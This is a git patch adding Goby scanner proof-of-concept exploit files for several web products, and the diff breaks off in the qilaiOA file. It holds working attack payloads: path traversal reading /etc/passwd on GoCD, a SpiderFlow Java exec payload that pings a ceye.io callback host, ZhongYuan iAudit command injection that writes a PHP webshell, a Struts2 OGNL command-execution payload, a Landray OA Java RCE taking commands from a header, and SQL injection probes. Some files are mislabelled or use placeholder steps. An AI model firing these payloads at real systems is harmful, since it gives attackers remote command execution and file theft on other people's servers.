From 1ff094782523be09eede219ea36f47f2025c6ce4 Mon Sep 17 00:00:00 2001
From: JiaoZi00 <110288727+JiaoZi00@users.noreply.github.com>
Date: Wed, 3 Aug 2022 16:11:19 +0800
Subject: [PATCH] Add files via upload
---
goby_pocs/Cerebro_request_SSRF.json | 99 +++++++++++
...Arbitrary_file_reading_CVE_2021_43287.json | 99 +++++++++++
goby_pocs/SpiderFlow_save__remote_code.json | 99 +++++++++++
...uan_iAudit_get_luser_by_sshport.php_RCE.go | 104 +++++++++++
goby_pocs/feishimei_struts2_remote_code.json | 102 +++++++++++
...liOA_8000workFlowService_SQLinjection.json | 99 +++++++++++
goby_pocs/landray_oa_treexml_rce.go | 167 ++++++++++++++++++
.../qilaiOA_messageurl.aspx_SQLinjection.json | 99 +++++++++++
.../qilaiOA_treelist.aspx_SQLinjection.json | 102 +++++++++++
..._hospital_ioFileExport.aspx_file_read.json | 99 +++++++++++
10 files changed, 1069 insertions(+)
create mode 100644 goby_pocs/Cerebro_request_SSRF.json
create mode 100644 goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json
create mode 100644 goby_pocs/SpiderFlow_save__remote_code.json
create mode 100644 goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go
create mode 100644 goby_pocs/feishimei_struts2_remote_code.json
create mode 100644 goby_pocs/huatiandongliOA_8000workFlowService_SQLinjection.json
create mode 100644 goby_pocs/landray_oa_treexml_rce.go
create mode 100644 goby_pocs/qilaiOA_messageurl.aspx_SQLinjection.json
create mode 100644 goby_pocs/qilaiOA_treelist.aspx_SQLinjection.json
create mode 100644 goby_pocs/red_fan_OA_hospital_ioFileExport.aspx_file_read.json
diff --git a/goby_pocs/Cerebro_request_SSRF.json b/goby_pocs/Cerebro_request_SSRF.json
new file mode 100644
index 0000000..23cff72
--- /dev/null
+++ b/goby_pocs/Cerebro_request_SSRF.json
@@ -0,0 +1,99 @@
+{
+ "Name": "fumengyun AjaxMethod.ashx SQL injection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "title=\"孚盟云\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "SELECT",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "SELECT",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-02 21:53:57",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json b/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json
new file mode 100644
index 0000000..f2c5095
--- /dev/null
+++ b/goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json
@@ -0,0 +1,99 @@
+{
+ "Name": "GoCD Arbitrary file reading CVE-2021-43287",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "title=\"Login - Go\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-15 22:05:52",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/SpiderFlow_save__remote_code.json b/goby_pocs/SpiderFlow_save__remote_code.json
new file mode 100644
index 0000000..c24e075
--- /dev/null
+++ b/goby_pocs/SpiderFlow_save__remote_code.json
@@ -0,0 +1,99 @@
+{
+ "Name": "SpiderFlow save remote code",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "title=\"SpiderFlow\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/function/save",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping amth5e.ceye.io');{",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "exec",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-07 22:15:11",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go b/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go
new file mode 100644
index 0000000..f2e867f
--- /dev/null
+++ b/goby_pocs/ZhongYuan_iAudit_get_luser_by_sshport.php_RCE.go
@@ -0,0 +1,104 @@
+package exploits
+
+import (
+ "fmt"
+ "git.gobies.org/goby/goscanner/goutils"
+ "git.gobies.org/goby/goscanner/jsonvul"
+ "git.gobies.org/goby/goscanner/scanconfig"
+ "git.gobies.org/goby/httpclient"
+ "strings"
+)
+
+func init() {
+ expJson := `{
+ "Name": "ZhongYuan iAudit get_luser_by_sshport.php RCE",
+ "Description": "ZhongYuan iAudit get_luser_by_sshport.php ,The existence of command splicing leads to remote command execution vulnerability",
+ "Product": "ZhongYuan iAudit",
+ "Homepage": "https://www.tosec.com.cn/",
+ "DisclosureDate": "2021-06-01",
+ "Author": "PeiQi",
+ "GobyQuery": "body=\"admin.php?controller=admin_index&action=chklogin&ref\"",
+ "Level": "3",
+ "Impact": "
The existence of command splicing leads to remote command execution vulnerability
",
+ "Recommendation": "",
+ "References": [
+ "http://wiki.peiqi.tech"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Cmd",
+ "type": "input",
+ "value": "id"
+ }
+ ],
+ "ScanSteps": [
+ "AND"
+ ],
+ "ExploitSteps": null,
+ "Tags": [
+ "RCE"
+ ],
+ "CVEIDs": null,
+ "CVSSScore": "0.0",
+ "AttackSurfaces": {
+ "Application": [
+ "WangKang Next generation firewall"
+ ],
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ },
+ "Recommandation": "Upgrade version
"
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
+ randomStr := goutils.RandomHexString(8) + ".php"
+ uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22id%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
+ cfg_1 := httpclient.NewGetRequestConfig(uri_1)
+ cfg_1.VerifyTls = false
+ cfg_1.FollowRedirect = false
+ cfg_1.Header.Store("Content-type", "application/json")
+ if resp, err := httpclient.DoHttpRequest(u, cfg_1); err == nil {
+ if resp.StatusCode == 200 {
+ uri_2 := "/" + randomStr
+ cfg_2 := httpclient.NewGetRequestConfig(uri_2)
+ cfg_2.VerifyTls = false
+ cfg_2.FollowRedirect = false
+ cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
+ if resp, err := httpclient.DoHttpRequest(u, cfg_2); err == nil {
+ return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "uid")
+ }
+ }
+ }
+ return false
+ },
+ func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
+ randomStr := goutils.RandomHexString(8) + ".php"
+ cmd := ss.Params["Cmd"].(string)
+ uri_1 := "/get_luser_by_sshport.php?clientip=1;echo%20'%3C%3Fphp%20system(%22" + cmd + "%22)%3Bunlink(__FILE__)%3F%3E'>/opt/freesvr/web/htdocs/freesvr/audit/" + randomStr + ";&clientport=1"
+ cfg_1 := httpclient.NewGetRequestConfig(uri_1)
+ cfg_1.VerifyTls = false
+ cfg_1.FollowRedirect = false
+ cfg_1.Header.Store("Content-type", "application/json")
+ if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_1); err == nil {
+ if resp.StatusCode == 200 {
+ uri_2 := "/" + randomStr
+ cfg_2 := httpclient.NewGetRequestConfig(uri_2)
+ cfg_2.VerifyTls = false
+ cfg_2.FollowRedirect = false
+ cfg_2.Header.Store("Content-type", "application/x-www-form-urlencoded")
+ if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg_2); err == nil {
+ expResult.Output = resp.Utf8Html
+ expResult.Success = true
+ }
+ }
+ }
+ return expResult
+ },
+ ))
+}
\ No newline at end of file
diff --git a/goby_pocs/feishimei_struts2_remote_code.json b/goby_pocs/feishimei_struts2_remote_code.json
new file mode 100644
index 0000000..15fcc44
--- /dev/null
+++ b/goby_pocs/feishimei_struts2_remote_code.json
@@ -0,0 +1,102 @@
+{
+ "Name": "feishimei struts2 remote code",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "title=\"飞视美视频会议系统\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/confinfoaction!showallConfinfos.action",
+ "follow_redirect": true,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "('\\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\\43context[\\'xwork.MethodAccessor.denyMethodExecution\\']\\75false')(b))&('\\43c')(('\\43_memberAccess.excludeProperties\\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\\43mycmd\\75\\'ipconfig\\'')(d))&(h)(('\\43myret\\75@java.lang.Runtime@getRuntime().exec(\\43mycmd)')(d))&(i)(('\\43mydat\\75new\\40java.io.DataInputStream(\\43myret.getInputStream())')(d))&(j)(('\\43myres\\75new\\40byte[51020]')(d))&(k)(('\\43mydat.readFully(\\43myres)')(d))&(l)(('\\43mystr\\75new\\40java.lang.String(\\43myres)')(d))&(m)(('\\43myout\\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\\43myout.getWriter().println(\\43mystr)')(d))",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "IP",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-07 22:39:00",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/huatiandongliOA_8000workFlowService_SQLinjection.json b/goby_pocs/huatiandongliOA_8000workFlowService_SQLinjection.json
new file mode 100644
index 0000000..b697c5d
--- /dev/null
+++ b/goby_pocs/huatiandongliOA_8000workFlowService_SQLinjection.json
@@ -0,0 +1,99 @@
+{
+ "Name": "huatiandongliOA 8000workFlowService SQLinjection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "app=\"Hua Tian Power -Oa8000\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "gobysec@gmail.com",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/OAapp/bfapp/buffalo/workFlowService",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": " \r\ngetDataListForTree \r\nselect user() \r\n",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "user",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-11 22:59:15",
+ "GobyVersion": "1.9.323"
+}
\ No newline at end of file
diff --git a/goby_pocs/landray_oa_treexml_rce.go b/goby_pocs/landray_oa_treexml_rce.go
new file mode 100644
index 0000000..afd9a37
--- /dev/null
+++ b/goby_pocs/landray_oa_treexml_rce.go
@@ -0,0 +1,167 @@
+package exploits
+
+import (
+ "git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+ expJson := `{
+ "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞",
+ "Description": "蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限
",
+ "Product": "蓝凌OA",
+ "Homepage": "www.landray.com.cn",
+ "DisclosureDate": "2022-07-18",
+ "Author": "",
+ "FofaQuery": "app=\"Landray-OA系统\"",
+ "GobyQuery": "app=\"Landray-OA系统\"",
+ "Level": "3",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20treexml.tmpl%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html"
+ ],
+ "Is0day": false,
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "command",
+ "type": "input",
+ "value": "whoami",
+ "show": ""
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/data/sys-common/treexml.tmpl",
+ "follow_redirect": true,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
+ "Accept-Encoding": "gzip, deflate",
+ "cmd": "echo This page has a bug",
+ "Accept": "*/*",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+new+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "This page has a bug",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/data/sys-common/treexml.tmpl",
+ "follow_redirect": true,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
+ "Accept-Encoding": "gzip, deflate",
+ "cmd": "{{{command}}}",
+ "Accept": "*/*",
+ "Content-Type": "application/x-www-form-urlencoded"
+ },
+ "data_type": "text",
+ "data": "s_bean=ruleFormulaValidate&script=boolean+flag+%3d+false%3bThreadGroup+group+%3d+Thread.currentThread().getThreadGroup()%3bjava.lang.reflect.Field+f+%3d+group.getClass().getDeclaredField(\"threads\")%3bf.setAccessible(true)%3bThread[]+threads+%3d+(Thread[])+f.get(group)%3bfor+(int+i+%3d+0%3b+i+<+threads.length%3b+i%2b%2b)+{+try+{+Thread+t+%3d+threads[i]%3bif+(t+%3d%3d+null)+{+continue%3b+}String+str+%3d+t.getName()%3bif+(str.contains(\"exec\")+||+!str.contains(\"http\"))+{+continue%3b+}f+%3d+t.getClass().getDeclaredField(\"target\")%3bf.setAccessible(true)%3bObject+obj+%3d+f.get(t)%3bif+(!(obj+instanceof+Runnable))+{+continue%3b+}f+%3d+obj.getClass().getDeclaredField(\"this$0\")%3bf.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getDeclaredField(\"handler\")%3b+}+catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getSuperclass().getSuperclass().getDeclaredField(\"handler\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3btry+{+f+%3d+obj.getClass().getSuperclass().getDeclaredField(\"global\")%3b+}catch+(NoSuchFieldException+e)+{+f+%3d+obj.getClass().getDeclaredField(\"global\")%3b+}f.setAccessible(true)%3bobj+%3d+f.get(obj)%3bf+%3d+obj.getClass().getDeclaredField(\"processors\")%3bf.setAccessible(true)%3bjava.util.List+processors+%3d+(java.util.List)+(f.get(obj))%3bfor+(int+j+%3d+0%3b+j+<+processors.size()%3b+%2b%2bj)+{+Object+processor+%3d+processors.get(j)%3bf+%3d+processor.getClass().getDeclaredField(\"req\")%3bf.setAccessible(true)%3bObject+req+%3d+f.get(processor)%3bObject+resp+%3d+req.getClass().getMethod(\"getResponse\",+new+Class[0]).invoke(req,+new+Object[0])%3bstr+%3d+(String)+req.getClass().getMethod(\"getHeader\",+new+Class[]{String.class}).invoke(req,+new+Object[]{\"cmd\"})%3bif+(str+!%3d+null+%26%26+!str.isEmpty())+{+resp.getClass().getMethod(\"setStatus\",+new+Class[]{int.class}).invoke(resp,+new+Object[]{new+Integer(200)})%3bString[]+cmds+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+new+String[]{\"cmd.exe\",+\"/c\",+str}+%3a+new+String[]{\"/bin/sh\",+\"-c\",+str}%3bString+charsetName+%3d+System.getProperty(\"os.name\").toLowerCase().contains(\"window\")+%3f+\"GBK\"%3a\"UTF-8\"%3bbyte[]+text2+%3d(new+java.util.Scanner((new+ProcessBuilder(cmds)).start().getInputStream(),charsetName)).useDelimiter(\"\\\\A\").next().getBytes(charsetName)%3bbyte[]+result%3d(\"Execute%3a++++\"%2bnew+String(text2,\"utf-8\")).getBytes(charsetName)%3btry+{+Class+cls+%3d+Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\")%3bobj+%3d+cls.newInstance()%3bcls.getDeclaredMethod(\"setBytes\",+new+Class[]{byte[].class,+int.class,+int.class}).invoke(obj,+new+Object[]{result,+new+Integer(0),+new+Integer(result.length)})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}+catch+(NoSuchMethodException+var5)+{+Class+cls+%3d+Class.forName(\"java.nio.ByteBuffer\")%3bobj+%3d+cls.getDeclaredMethod(\"wrap\",+new+Class[]{byte[].class}).invoke(cls,+new+Object[]{result})%3bresp.getClass().getMethod(\"doWrite\",+new+Class[]{cls}).invoke(resp,+new+Object[]{obj})%3b+}flag+%3d+true%3b+}if+(flag)+{+break%3b+}+}if+(flag)+{+break%3b+}+}+catch+(Exception+e)+{+continue%3b+}+}"
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "Tags": [
+ "代码执⾏"
+ ],
+ "VulType": [
+ "代码执⾏"
+ ],
+ "CVEIDs": [
+ ""
+ ],
+ "CNNVD": [
+ ""
+ ],
+ "CNVD": [
+ ""
+ ],
+ "CVSSScore": "",
+ "Translation": {
+ "CN": {
+ "Name": "蓝凌OA treexml.tmpl 远程代码执行漏洞",
+ "Product": "蓝凌OA",
+ "Description": "蓝凌OA treexml.tmpl存在远程代码执行漏洞,攻击者通过发送特定的请求包可以获取服务器权限
",
+ "Recommendation": "",
+ "Impact": "",
+ "VulType": [
+ "代码执⾏"
+ ],
+ "Tags": [
+ "代码执⾏"
+ ]
+ },
+ "EN": {
+ "Name": "landray-oa-treexml-rce",
+ "Product": "",
+ "Description": "",
+ "Recommendation": "",
+ "Impact": "",
+ "VulType": [],
+ "Tags": []
+ }
+ },
+ "AttackSurfaces": {
+ "Application": null,
+ "Support": null,
+ "Service": null,
+ "System": null,
+ "Hardware": null
+ }
+}`
+
+ ExpManager.AddExploit(NewExploit(
+ goutils.GetFileName(),
+ expJson,
+ nil,
+ nil,
+ ))
+}
\ No newline at end of file
diff --git a/goby_pocs/qilaiOA_messageurl.aspx_SQLinjection.json b/goby_pocs/qilaiOA_messageurl.aspx_SQLinjection.json
new file mode 100644
index 0000000..3358613
--- /dev/null
+++ b/goby_pocs/qilaiOA_messageurl.aspx_SQLinjection.json
@@ -0,0 +1,99 @@
